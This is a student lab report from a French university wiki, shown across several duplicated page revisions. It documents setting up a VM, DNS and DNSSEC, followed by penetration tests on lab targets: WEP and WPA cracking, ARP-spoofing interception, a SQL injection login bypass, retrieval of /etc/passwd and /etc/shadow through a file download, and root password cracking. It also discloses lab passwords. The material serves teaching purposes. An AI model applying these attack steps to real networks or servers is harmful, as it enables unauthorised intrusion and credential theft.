<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
===Sécurisation de site web par certificat===<br />
<br />
La première étape est de générer un certificat à l'aide de la commande suivante :<br />
<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout calicedelamort.site.key -out calicedelamort.site.csr<br />
<br />
Ensuite, on se rend sur gandi.net, et nous ajoutons le certificat généré à notre domaine calicedelamort.site. Ensuite, nous attendons d'obtenir le certificat signé sur le serveur de mail que nous avons installé sur notre VM.<br />
<br />
===Sécurisation de serveur DNS par DNSSEC===<br />
<br />
En premier lieu, nous devons activer le protocole DNSSEC dans le fichier de configuration de bind : /etc/bind/named.conf.local<br />
<br />
dnssec-enable yes<br />
<br />
Ensuite, nous créons un dossier calicedelamort.site.dnssec/ puis nous y générons les clefs ZSK et KSK à l'aide des commandes suivantes :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE calicedelamort.site<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE calicedelamort.site<br />
<br />
Puis, nous allons dans le fichier de configuration de notre site : /etc/bind/db.calicedelamort.site, et nous y ajoutons les deux lignes suivantes :<br />
<br />
$include /etc/bind/calicedelamort.site.dnssec/calicedelamort.site-ksk.key<br />
$include /etc/bind/calicedelamort.site.dnssec/calicedelamort.site-zsk.key<br />
<br />
Enfin, nous signons le tout à l'aide de la commande :<br />
<br />
dnssec-signzone -o calicedelamort.site -k calicedelamort.site-ksk ../db.calicedelamort.site calicedelamort.site-zsk <br />
<br />
Dans le fichier /etc/bind/named.conf.local, nous modifions la zone pour y mettre le fichier signé :<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site.signed";<br />
allow-transfer{217.70.177.40;};<br />
};<br />
<br />
Pour finir, nous relançons bind9 :<br />
<br />
service bind9 restart<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
[[Fichier:Capture-wep-encrypt.PNG|center]]<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
[[Fichier:Crack_resultat_WPA.PNG|center]]<br />
<br />
Il est aussi possible de cracker la clef avec hashcat. Cela permet de d'utiliser la puissance du GPU pour brute force la clef. Grace à ma super carte graphique la 2080 super, nous avons pu diviser par 100 le temps du brute force.<br />
<br />
La commande est la suivante:<br />
crunch 8 8 0123456789 | hashcat -m 2500 output.hccapx<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
[[Fichier:Wiresharck.jpg|center|400px]]<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
<br />
Pour cette partie, on se rend sur le lien http://honey.plil.info.<br />
Nous y trouvons une page de connexion demandant un login et un password.<br />
<br />
N'ayant pas de compte sur ce site, on essaye une simple injection SQL :<br />
Dans les champs 'login' et 'password' on écrit l'injection SQL suivante : " ' OR 1 = 1 -- "<br />
Ca fonctionne ! Nous avons accès aux informations de connexion des utilisateurs<br />
<br />
<br />
Grâce aux informations trouvées à l'aide de l'injection SQL nous pouvons nous connecter en tant qu'administrateur.<br />
En explorant un peu le site, nous trouvons une fonctionnalité qui permet d'importer des fichiers sur la page web et de les télécharger.<br />
<br />
[[Fichier:Ajoutmanuel.png|center]]<br />
<br />
<br />
En parallèle de cela, à l'aide de la commande<br />
dirb http://honey.plil.info/<br />
On trouve une page phpmyadmin : http://honey.plil.info/phpmyadmin<br />
<br />
[[Fichier:phpmyadmin.png|center]]<br />
<br />
Encore une page de connexion, il faut donc trouver le login et le password permettant de se connecter à cette page. Cette fois, les injections SQL ne fonctionne pas.<br />
<br />
Cependant, nous avons vu plus tôt que nous pouvions importer et télécharger des fichiers depuis la page web précédente, et en effectuant quelques tests, nous nous sommes rendu compte que ces fichiers provenaient du serveur qui hébergeait le site web.<br />
<br />
En regardant sur internet, nous avons trouvé que le fichier contenant les logins et mot de passes de connexion à la page phpmyadmin se trouvaient dans /etc/phpmyadmin/config-db.php<br />
<br />
Nous uploadons et téléchargeons ce fichier depuis la page web :<br />
<br />
[[Fichier:Config_dbphp.png|center]]<br />
<br />
Nous avons maintenant accès à la page de gestion de la base de données du serveur.<br />
<br />
<br />
Maintenant que l'on sait que l'on peut télécharger des fichiers depuis le serveur, on décide de télécharger le fichier /etc/passwd :<br />
<br />
[[Fichier:Passwd.PNG|center]]<br />
<br />
<br />
On trouve l'utilisateur 'rex' sur lequel on pourrait tenter de se connecter en ssh. Nous essayons, cependant, il nous faut le mot de passe de cet utilisateur. Explorons donc phpmyadmin en s'y connectant en tant que root.<br />
<br />
En cherchant bien, on trouve un fichiers 'users' (dans la structure 'test') dans lequel apparait le mot de passe de l'utilisateur 'rex' en clair.<br />
<br />
On se connecte donc en ssh sur cet utilisateur.<br />
ssh rex@honey.plil.info<br />
<br />
La dernière étape est donc de récupérer le mot de passe root du serveur. Or, on sait que celui-ci se trouve dans le fichier /etc/shadow , fichier qui est, bien entendu, accessible depuis l'utilisateur 'rex'.<br />
<br />
Une fois ce fichier récupéré, il ne nous reste plus qu'à brute force le mot de passe root.<br />
<br />
On utilise le programme 'John The Ripper', cependant, il nous faut un dictionnaire pour aider John The Riper.<br />
On sait que le mot de passe root à la même particularité que les mots de passes des machines de TPs. On crée donc un dictionnaire en fonction de cette information à l'aide de la commande 'crunch'.<br />
<br />
On peut finalement lancer John The Riper avec le dictionnaire, on trouve le mot de passe, et on peut enfin se connecter en tant qu'utilisateur root sur le serveur.<br />
<br />
==Réalisation==<br />
<br />
===Sécurisation de données===<br />
Nous avons dans un premier temps créé 3 partitions virtuelles:<br />
<br />
lvcreate -L1G -n calicedelamort-raid1 storage<br />
lvcreate -L1G -n calicedelamort-raid2 storage<br />
lvcreate -L1G -n calicedelamort-raid3 storage<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)<br />
<br />
On crée ensuite un inventaire : /etc/ansible/hosts<br />
<br />
[Me_Chassiron]<br />
calicedelamort ansible_host=192.168.42.9<br />
[All_Chassiron]<br />
calicedelamort ansible_host=192.168.42.9<br />
truffe ansible_host=192.168.42.12<br />
girolle ansible_host=192.168.42.7<br />
amanite ansible_host=192.168.42.5<br />
tricholome ansible_host=192.168.42.4<br />
ophiocordyceps ansible_host=192.168.42.2</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55131TP sysres IMA5sc 2020/2021 G92020-12-21T17:30:27Z<p>Pvernier : </p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
===Sécurisation de site web par certificat===<br />
<br />
La première étape est de générer un certificat à l'aide de la commande suivante :<br />
<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout calicedelamort.site.key -out calicedelamort.site.csr<br />
<br />
Ensuite, on se rend sur gandi.net, et nous ajoutons le certificat généré à notre domaine calicedelamort.site. Ensuite, nous attendons d'obtenir le certificat signé sur le serveur de mail que nous avons installé sur notre VM.<br />
<br />
===Sécurisation de serveur DNS par DNSSEC===<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
[[Fichier:Capture-wep-encrypt.PNG|center]]<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
[[Fichier:Crack_resultat_WPA.PNG|center]]<br />
<br />
Il est aussi possible de cracker la clef avec hashcat. Cela permet de d'utiliser la puissance du GPU pour brute force la clef. Grace à ma super carte graphique la 2080 super, nous avons pu diviser par 100 le temps du brute force.<br />
<br />
La commande est la suivante:<br />
crunch 8 8 0123456789 | hashcat -m 2500 output.hccapx<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
[[Fichier:Wiresharck.jpg|center|400px]]<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
<br />
Pour cette partie, on se rend sur le lien http://honey.plil.info.<br />
Nous y trouvons une page de connexion demandant un login et un password.<br />
<br />
N'ayant pas de compte sur ce site, on essaye une simple injection SQL :<br />
Dans les champs 'login' et 'password' on écrit l'injection SQL suivante : " ' OR 1 = 1 -- "<br />
Ca fonctionne ! Nous avons accès aux informations de connexion des utilisateurs<br />
<br />
<br />
Grâce aux informations trouvées à l'aide de l'injection SQL nous pouvons nous connecter en tant qu'administrateur.<br />
En explorant un peu le site, nous trouvons une fonctionnalité qui permet d'importer des fichiers sur la page web et de les télécharger.<br />
<br />
[[Fichier:Ajoutmanuel.png|center]]<br />
<br />
<br />
En parallèle de cela, à l'aide de la commande<br />
dirb http://honey.plil.info/<br />
On trouve une page phpmyadmin : http://honey.plil.info/phpmyadmin<br />
<br />
[[Fichier:phpmyadmin.png|center]]<br />
<br />
Encore une page de connexion, il faut donc trouver le login et le password permettant de se connecter à cette page. Cette fois, les injections SQL ne fonctionne pas.<br />
<br />
Cependant, nous avons vu plus tôt que nous pouvions importer et télécharger des fichiers depuis la page web précédente, et en effectuant quelques tests, nous nous sommes rendu compte que ces fichiers provenaient du serveur qui hébergeait le site web.<br />
<br />
En regardant sur internet, nous avons trouvé que le fichier contenant les logins et mot de passes de connexion à la page phpmyadmin se trouvaient dans /etc/phpmyadmin/config-db.php<br />
<br />
Nous uploadons et téléchargeons ce fichier depuis la page web :<br />
<br />
[[Fichier:Config_dbphp.png|center]]<br />
<br />
Nous avons maintenant accès à la page de gestion de la base de données du serveur.<br />
<br />
<br />
Maintenant que l'on sait que l'on peut télécharger des fichiers depuis le serveur, on décide de télécharger le fichier /etc/passwd :<br />
<br />
[[Fichier:Passwd.PNG|center]]<br />
<br />
<br />
On trouve l'utilisateur 'rex' sur lequel on pourrait tenter de se connecter en ssh. Nous essayons, cependant, il nous faut le mot de passe de cet utilisateur. Explorons donc phpmyadmin en s'y connectant en tant que root.<br />
<br />
En cherchant bien, on trouve un fichiers 'users' (dans la structure 'test') dans lequel apparait le mot de passe de l'utilisateur 'rex' en clair.<br />
<br />
On se connecte donc en ssh sur cet utilisateur.<br />
ssh rex@honey.plil.info<br />
<br />
La dernière étape est donc de récupérer le mot de passe root du serveur. Or, on sait que celui-ci se trouve dans le fichier /etc/shadow , fichier qui est, bien entendu, accessible depuis l'utilisateur 'rex'.<br />
<br />
Une fois ce fichier récupéré, il ne nous reste plus qu'à brute force le mot de passe root.<br />
<br />
On utilise le programme 'John The Ripper', cependant, il nous faut un dictionnaire pour aider John The Riper.<br />
On sait que le mot de passe root à la même particularité que les mots de passes des machines de TPs. On crée donc un dictionnaire en fonction de cette information à l'aide de la commande 'crunch'.<br />
<br />
On peut finalement lancer John The Riper avec le dictionnaire, on trouve le mot de passe, et on peut enfin se connecter en tant qu'utilisateur root sur le serveur.<br />
<br />
==Réalisation==<br />
<br />
===Sécurisation de données===<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55121TP sysres IMA5sc 2020/2021 G92020-12-21T16:54:50Z<p>Pvernier : /* Cassage de mot de passe WPA-PSK par force brute */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
[[Fichier:Capture-wep-encrypt.PNG|center]]<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
[[Fichier:Crack_resultat_WPA.PNG|center]]<br />
<br />
Il est aussi possible de cracker la clef avec hashcat. Cela permet de d'utiliser la puissance du GPU pour brute force la clef. Grace à ma super carte graphique la 2080 super, nous avons pu diviser par 100 le temps du brute force.<br />
<br />
La commande est la suivante:<br />
crunch 8 8 0123456789 | hashcat -m 2500 output.hccapx<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
[[Fichier:Wiresharck.jpg|center|400px]]<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
<br />
Pour cette partie, on se rend sur le lien http://honey.plil.info.<br />
Nous y trouvons une page de connexion demandant un login et un password.<br />
<br />
N'ayant pas de compte sur ce site, on essaye une simple injection SQL :<br />
Dans les champs 'login' et 'password' on écrit l'injection SQL suivante : " ' OR 1 = 1 -- "<br />
Ca fonctionne ! Nous avons accès aux informations ci-dessous :<br />
<br />
[[Fichier:injectionSQL.PNG|center]]<br />
<br />
Grâce aux informations trouvées à l'aide de l'injection SQL nous pouvons nous connecter en tant qu'administrateur.<br />
